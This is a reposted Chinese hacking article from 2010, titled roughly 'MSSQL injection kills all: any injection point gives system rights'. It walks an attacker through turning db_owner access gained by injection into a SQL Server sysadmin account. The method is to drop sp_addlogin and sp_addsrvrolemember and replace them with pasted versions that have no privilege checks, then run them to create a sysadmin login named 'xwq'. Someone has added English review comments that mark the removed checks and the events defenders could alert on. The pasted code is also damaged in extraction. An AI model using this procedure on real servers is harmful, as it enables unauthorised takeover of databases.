- 阅览次数: 文章来源: 原文作者: 整理日期: 2010-05-22
MSSQL注入通杀,只要有注入点就有系统权限
MSSQL注入通杀,只要有注入点就有系统权限
不知道大家看过这篇文章没有,可以在db_owner角色下添加SYSADMIN帐号,这招真狠啊,存在MSSQL注射漏洞的服务器又要遭殃了。方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程,绕过了验证部分。具体方法如下:
先输入
DROP procedure sp_addlogin,
然后在IE里面输入
-- NOTE(review): replacement text for master..sp_addlogin as pasted in the
-- article. Of the checks the stock procedure performs, only these survive
-- here: login-name syntax (sp_validname), no backslash, reserved names,
-- duplicate login, default database/language, SID length and the encryption
-- option. No test of the caller's own privilege appears anywhere below; the
-- procedure that ships with the server is expected to gate on
-- is_srvrolemember before touching master..sysxlogins -- compare against a
-- clean master to confirm.
-- Defender view: DROP/CREATE of an sp_-prefixed procedure issued from a
-- db_owner context, and any direct INSERT into master.dbo.sysxlogins, are the
-- events worth alerting on.
-- Extraction damage, left as found: quotes are the typographic ’ rather than
-- ', several "--" comments were line-wrapped so their continuation became a
-- bare token (CONFIGURABLE???, LANGUAGE, encryption, SYSLOGINS CHANGE --),
-- the "ATTEMPT THE INSERT" banner lost its leading "--", and an HTML span
-- sits after the first RETURN (1).
CREATE procedure sp_addlogin
@loginame sysname
,@passwd sysname = NULL
,@defdb ; ; sysname = ’master’ -- UNDONE: DEFAULT
CONFIGURABLE???
,@deflanguage sysname = NULL
,@sid varbinary(16) = NULL
,@encryptopt varchar(20) = NULL
AS
-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
SET nocount ON
Declare @ret int -- return value of sp call
-- DISALLOW USER TRANSACTION --
SET implicit_transactions off
IF (@@trancount > 0)
begin
raiserror(15002,-1,-1,’sp_addlogin’)
RETURN (1)
end
-- VALIDATE LOGIN NAME AS:
-- (1) Valid SQL Name (SQL LOGIN)
-- (2) No backslash (NT users only)
-- (3) Not a reserved login name
execute @ret = sp_validname @loginame
IF (@ret <> 0)
RETURN (1)<span id="more-952"></span>
IF (charindex(’\’, @loginame) > 0)
begin
raiserror(15006,-1,-1,@loginame)
RETURN (1)
end
--Note: different case sa is allowed.
IF (@loginame = ’sa’ OR lower(@loginame) IN (’public’))
begin
raiserror(15405, -1 ,-1, @loginame)
RETURN (1)
end
-- LOGIN NAME MUST NOT ALREADY EXIST --
-- The duplicate check reads master.dbo.syslogins; the INSERT further down
-- writes master.dbo.sysxlogins.
IF EXISTS(SELECT * FROM master.dbo.syslogins WHERE loginname =
@loginame)
begin
raiserror(15025,-1,-1,@loginame)
RETURN (1)
end
-- VALIDATE DEFAULT DATABASE --
IF db_id(@defdb) IS NULL
begin
raiserror(15010,-1,-1,@defdb)
RETURN (1)
end
-- VALIDATE DEFAULT LANGUAGE --
IF (@deflanguage IS NOT NULL)
begin
Execute @ret = sp_validlang @deflanguage
IF (@ret <> 0)
RETURN (1)
end
ELSE
begin
SELECT @deflanguage = name FROM master.dbo.syslanguages
WHERE langid = @@default_langid --server default
LANGUAGE
IF @deflanguage IS NULL
SELECT @deflanguage = N’us_english’
end
-- VALIDATE SID IF GIVEN --
IF ((@sid IS NOT NULL) AND (datalength(@sid) <> 16))
begin
raiserror(15419,-1,-1)
RETURN (1)
end
else IF @sid IS NULL
SELECT @sid = newid()
-- A SID that suser_sname already resolves is rejected.
IF (suser_sname(@sid) IS NOT NULL)
begin
raiserror(15433,-1,-1)
RETURN (1)
end
-- VALIDATE AND USE ENCRYPTION OPTION --
declare @xstatus smallint
SELECT @xstatus = 2 -- access
-- Without @encryptopt the password goes through pwdencrypt. With
-- ’skip_encryption_old’ it is truncated to 30 characters and bit 0x800 is
-- set in xstatus. With ’skip_encryption’ @passwd is stored exactly as given.
IF @encryptopt IS NULL
SELECT @passwd = pwdencrypt(@passwd)
else IF @encryptopt = ’skip_encryption_old’
begin
SELECT @xstatus = @xstatus | 0x800, -- old-style
encryption
@passwd = convert(sysname, convert(varbinary
(30), convert(varchar(30), @passwd)))
end
else IF @encryptopt <> ’skip_encryption’
begin
raiserror(15600,-1,-1,’sp_addlogin’)
RETURN 1
end
-- (the next line is the "ATTEMPT THE INSERT OF THE NEW LOGIN" banner with
-- its leading "--" lost in extraction)
ATTEMPT THE INSERT OF THE NEW LOGIN --
-- Positional INSERT with no column list, straight into the system table.
INSERT INTO master.dbo.sysxlogins VALUES
(NULL, @sid, @xstatus, getdate(),
getdate(), @loginame, convert(varbinary(256), @passwd),
db_id(@defdb), @deflanguage)
IF @@error <> 0 -- this indicates we saw duplicate row
RETURN (1)
-- Update PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE
SYSLOGINS CHANGE --
-- Dynamic exec kept only for the side effect the comment above describes.
exec(’USE master GRANT ALL TO NULL’)
-- FINALIZATION: RETURN SUCCESS/FAILURE --
raiserror(15298,-1,-1)
RETURN (0) -- sp_addlogin
GO
OK,我们新建个用户exec master..sp_addlogin xwq
再DROP procedure sp_addsrvrolemember,然后在IE里输入
-- NOTE(review): replacement text for master..sp_addsrvrolemember as pasted in
-- the article. The only guard that remains is the refusal to touch ’sa’;
-- nothing below tests whether the caller may grant @rolename (the server's
-- own procedure is expected to check is_srvrolemember -- confirm against a
-- clean master), and an unrecognised @rolename is not rejected: the CASE
-- yields NULL and the UPDATE then ORs NULL into xstatus.
-- Defender view: the traces this path leaves are the xdate2 touch on the
-- sysxlogins row, message 15488 and the GRANT exec; audit direct UPDATEs of
-- master.dbo.sysxlogins. Quotes are typographic ’ and two "--" comments are
-- line-wrapped, as in the article's sp_addlogin paste; left as found.
CREATE procedure sp_addsrvrolemember
@loginame sysname, -- login name
@rolename sysname = NULL -- server role name
AS
-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
SET nocount ON
declare @ret int, -- return value of sp call
@rolebit smallint,
@ismem int
-- DISALLOW USER TRANSACTION --
SET implicit_transactions off
IF (@@trancount > 0)
begin
raiserror(15002,-1,-1,’sp_addsrvrolemember’)
RETURN (1)
end
-- CANNOT CHANGE SA ROLES --
IF @loginame = ’sa’
begin
raiserror(15405, -1 ,-1, @loginame)
RETURN (1)
end
-- OBTAIN THE BIT FOR THIS ROLE --
-- Fixed server roles are flag bits in sysxlogins.xstatus; the mapping below
-- is the whole lookup, there is no table behind it.
SELECT @rolebit = CASE @rolename
WHEN ’sysadmin’ THEN 16
WHEN ’securityadmin’ THEN 32
WHEN ’serveradmin’ THEN 64
WHEN ’setupadmin’ THEN 128
WHEN ’processadmin’ THEN 256
WHEN ’diskadmin’ THEN 512
WHEN ’dbcreator’ THEN 1024
WHEN ’bulkadmin’ THEN 4096
ELSE NULL END
-- ADD ROW FOR NT LOGIN IF NEEDED --
-- A name with no syslogins row is treated as a Windows login and gets one.
IF NOT EXISTS(SELECT * FROM master.dbo.syslogins WHERE
loginname = @loginame)
begin
execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame
IF (@ret <> 0)
begin
raiserror(15007,-1,-1,@loginame)
RETURN (1)
end
end
-- Update ROLE MEMBERSHIP --
-- Membership is granted by OR-ing the role bit into xstatus directly;
-- @ismem is declared above but never used.
UPDATE master.dbo.sysxlogins SET xstatus = xstatus | @rolebit,
xdate2 = getdate()
WHERE name = @loginame AND srvid IS NULL
-- Update PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE
SYSLOGINS CHANGE --
exec(’USE master GRANT ALL TO NULL’)
raiserror(15488,-1,-1,@loginame,@rolename)
-- FINALIZATION: RETURN SUCCESS/FAILURE
RETURN (@@error) -- sp_addsrvrolemember
GO
接着再exec master..sp_addsrvrolemember xwq,sysadmin
这样就建立了一个SA用户了,用SQL连接器连接上就OK了。